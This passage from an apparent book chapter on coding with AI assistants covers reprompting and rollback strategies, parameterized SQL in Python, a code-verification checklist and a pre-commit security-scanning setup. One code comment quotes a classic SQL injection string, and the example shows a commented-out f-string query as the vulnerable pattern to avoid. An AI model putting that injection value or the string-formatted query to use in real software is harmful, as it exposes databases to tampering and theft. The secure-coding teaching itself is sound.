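        raise ValueError("page must be >= 0 and page_size must be > 0")
    start = page * page_size
    # Python slicing already clamps out-of-range bounds, which is
    # exactly the "beyond last page returns empty" behavior we want.
    return items[start:start + page_size]
```

For example, `get_page(list(range(10)), 3, 3)` returns `[9]` (the last partial page), and `get_page([], 2, 3)` returns `[]`.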
The Targeted Reprompt
Instead of starting completely fresh, you can give the AI a very targeted correction:
Stop. The current approach of building the SQL query with string
concatenation is fundamentally insecure. Let's start the database
layer over using parameterized queries only. Do not use f-strings
or string formatting for any SQL query. Use placeholders (%s for
MySQL, ? for SQLite, $1 for PostgreSQL) in every query.
Key elements of an effective targeted reprompt:
- Clear stop signal: "Stop" or "Let's start over on this part"
- Identification of the fundamental problem: not just the symptom, but the root cause
- Explicit constraint: what the new approach must do differently
- Specific enough to prevent repetition: do not leave room for the AI to drift back to the old pattern
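The constraint demanded in the reprompt above — placeholders instead of string formatting — looks like this in Python's built-in `sqlite3` module (a minimal sketch; the table and column names are illustrative):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO users (name) VALUES (?)", ("alice",))

# Parameterized: the driver treats the value as data, never as SQL,
# so a hostile input like "x' OR '1'='1" cannot change the query.
user_name = "alice"
row = conn.execute(
    "SELECT id, name FROM users WHERE name = ?", (user_name,)
).fetchone()

# NEVER do this -- string formatting invites SQL injection:
# conn.execute(f"SELECT * FROM users WHERE name = '{user_name}'")
```

The placeholder syntax varies by driver (`?` for SQLite, `%s` for MySQL drivers, `$1` for PostgreSQL's asyncpg), but the principle is identical: the query text and the data travel separately.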
The Incremental Rollback
If the AI's code was mostly correct before a recent "fix" broke it, roll back to the last known good state:
The code was working correctly before the last change. Let's go
back to the version that used a simple for loop instead of the
recursive approach. Here is the working version:
[paste the working code]
Now, starting from this working version, let's fix ONLY the issue
where it doesn't handle empty lists. Do not change anything else.
The Constraint Fence
When the AI keeps making the same type of mistake, add explicit constraints:
Generate the data processing function with these constraints:
1. NO nested loops (time complexity must be O(n) or O(n log n))
2. NO string concatenation for building queries
3. ALL database calls must use parameterized queries
4. EVERY function must handle empty input gracefully
5. NO global state or module-level variables
Violating any of these constraints means the code is wrong.
Please check each constraint before finalizing.
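Constraint 1 above (no nested loops) usually means replacing an O(n²) membership scan with a set. As a hedged illustration — the function name and task are hypothetical, chosen only to show the pattern — here is order-preserving deduplication done in O(n):

```python
def dedupe_preserving_order(items: list) -> list:
    """Remove duplicates in O(n), keeping first occurrences in order.

    Replaces the common AI-generated O(n^2) pattern of checking
    `if item not in result_list` inside the loop.
    """
    seen = set()
    result = []
    for item in items:
        if item not in seen:  # O(1) set lookup, not an inner list scan
            seen.add(item)
            result.append(item)
    return result
```

For example, `dedupe_preserving_order([3, 1, 3, 2, 1])` returns `[3, 1, 2]`. On a list of 100,000 items the set-based version is thousands of times faster than the list-membership version.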
Real-World Application: Experienced vibe coders report that the most productive conversations follow a pattern: start with a clear specification (Chapter 10), generate code, review carefully (Chapter 7), and if problems are found, use targeted reprompts rather than trying to fix everything incrementally. The "three strikes" rule is common: if three rounds of fixes do not resolve the issue, start a fresh conversation.
Saving Good Code Before Experimenting
Before asking the AI to make significant changes to working code, save the current version:
# Save to a file, copy to clipboard, or commit to git
git add . && git commit -m "Working version before AI refactor attempt"
This gives you a rollback point if the AI's changes make things worse. Version control is your best friend when doing iterative AI-assisted development (see Chapter 31 for detailed version control workflows).
14.10 Building Resilience: The Trust-but-Verify Mindset
The final and most important lesson of this chapter is attitudinal. The developers who are most effective with AI coding assistants share a common mindset: they trust the AI enough to use it extensively, but they verify its output rigorously.
The Trust Spectrum
Developers typically fall somewhere on this spectrum:
Blind trust (dangerous): Accepts all AI output without review. Copies code directly into production. Does not test edge cases. This developer will eventually have a serious incident.
Healthy skepticism (ideal): Uses AI extensively to accelerate development. Reviews every piece of generated code. Tests edge cases and security. Verifies imports and APIs. Treats AI output as a strong first draft that needs review.
Excessive distrust (unproductive): Second-guesses everything. Rewrites most AI output from scratch. Spends more time verifying than the code would take to write manually. Loses the productivity benefits of AI assistance.
The goal is to land in the middle — healthy skepticism. Use AI freely and confidently, but build verification into your workflow as a non-negotiable step.
The Verification Checklist
Build a personal verification checklist and use it consistently. Here is a starter template:
## AI Code Verification Checklist
### Imports and Dependencies
- [ ] All imports resolve to real modules
- [ ] Library versions are compatible
- [ ] No unnecessary dependencies added
### Logic
- [ ] Works with empty input
- [ ] Works with single-element input
- [ ] Works with maximum/boundary values
- [ ] Loop bounds are correct (no off-by-one)
- [ ] Comparison operators are correct (<= vs <)
### Security
- [ ] No SQL injection (all queries parameterized)
- [ ] No XSS (all user input escaped)
- [ ] No hardcoded secrets
- [ ] No path traversal vulnerabilities
- [ ] No insecure deserialization
### Performance
- [ ] No N+1 query patterns
- [ ] No quadratic algorithms on large inputs
- [ ] No blocking I/O in async code
- [ ] No unnecessary data copying
### Style and Maintenance
- [ ] Code matches project conventions
- [ ] No deprecated APIs or patterns
- [ ] Error messages are helpful
- [ ] Type hints are accurate
Automated Verification
Automate as much of the verification as possible. Set up your project with:
- Type checking (mypy or pyright) to catch type errors
- Linting (ruff, flake8, or pylint) to catch style and logic issues
- Security scanning (bandit) to catch common vulnerabilities
- Import checking to verify all imports resolve
- Tests (especially edge case tests) to catch logic errors
- Pre-commit hooks to run all of the above before every commit
# .pre-commit-config.yaml
repos:
  - repo: https://github.com/astral-sh/ruff-pre-commit
    rev: v0.4.0
    hooks:
      - id: ruff
        args: [--fix]
      - id: ruff-format
  - repo: https://github.com/pre-commit/mirrors-mypy
    rev: v1.9.0
    hooks:
      - id: mypy
  - repo: https://github.com/PyCQA/bandit
    rev: 1.7.8
    hooks:
      - id: bandit
        args: ['-r', '--severity-level', 'medium']
Best Practice: The most effective AI verification is layered. No single tool catches everything, but combining type checking, linting, security scanning, and targeted testing creates a safety net that catches most AI-generated issues before they reach production.
When to Trust AI More
AI output is more reliable when:
- The task is well-defined and common (CRUD operations, standard algorithms, common patterns)
- The prompt includes clear constraints and examples
- You are working with popular, well-documented libraries
- The generated code is short and focused
- You can easily test the output
When to Trust AI Less
AI output requires extra scrutiny when:
- The task involves security-critical logic
- The problem is novel or domain-specific
- The code interacts with external systems or APIs
- The prompt is ambiguous or underspecified
- The generated code is long and complex
- The task involves concurrency or distributed systems
- You are working with niche libraries or recent API changes
Building Organizational Resilience
For teams using AI coding assistants, consider:
- Code review remains essential. AI-generated code should go through the same review process as human-written code. Reviewers should be trained to watch for AI-specific failure patterns.
- Track AI-generated incidents. Keep a log of bugs that originated from AI-generated code. Look for patterns — this tells you where your verification process has gaps.
- Share knowledge. When someone on the team discovers a new AI failure pattern, share it with everyone. Build a team-specific "AI gotchas" document.
- Update prompts. If a particular type of error keeps recurring, update your prompt templates to explicitly guard against it.
Real-World Application: Companies that successfully adopt AI coding at scale report that their bug rates initially increase as developers learn to use AI tools, then decrease below pre-AI levels as developers internalize the trust-but-verify mindset and build automated verification pipelines. The transition period typically takes 2-3 months.
Chapter Summary
AI coding assistants are powerful tools that make mistakes. The key to using them effectively is not to avoid mistakes — that is impossible — but to catch them quickly and systematically.
We covered:
- Hallucinated APIs: AI invents functions, classes, and entire libraries. Verify imports immediately.
- Logic errors: Off-by-one, boundary conditions, race conditions, and incorrect algorithms. Test edge cases rigorously.
- Security vulnerabilities: SQL injection, XSS, hardcoded secrets, path traversal, insecure deserialization, weak crypto. Cross-reference against OWASP.
- Performance anti-patterns: N+1 queries, quadratic algorithms, blocking I/O, unnecessary copying. Review time complexity.
- Outdated patterns: Python 2 remnants, deprecated APIs, old framework patterns. Check current documentation.
- The confidence problem: AI never says "I don't know." Watch for signals and develop your "that's too easy" instinct.
- Systematic debugging: Use the VERIFY framework — Validate imports, Examine edge cases, Review security, Inspect logic, Find performance issues, Yell about types.
- Recovery strategies: Start fresh, targeted reprompt, incremental rollback, constraint fencing. Know when to abandon a conversation.
- Trust-but-verify: Use AI freely but verify rigorously. Automate verification with type checking, linting, security scanning, and tests.
The developers who are most effective with AI are not those who never encounter bugs — they are those who have systems for catching bugs before their users do. Build those systems, internalize the trust-but-verify mindset, and AI-generated code will be a massive accelerator rather than a liability.
Next chapter: Chapter 15: CLI Tools and Scripts — We move into Part III and start building real software, beginning with command-line tools and automation scripts.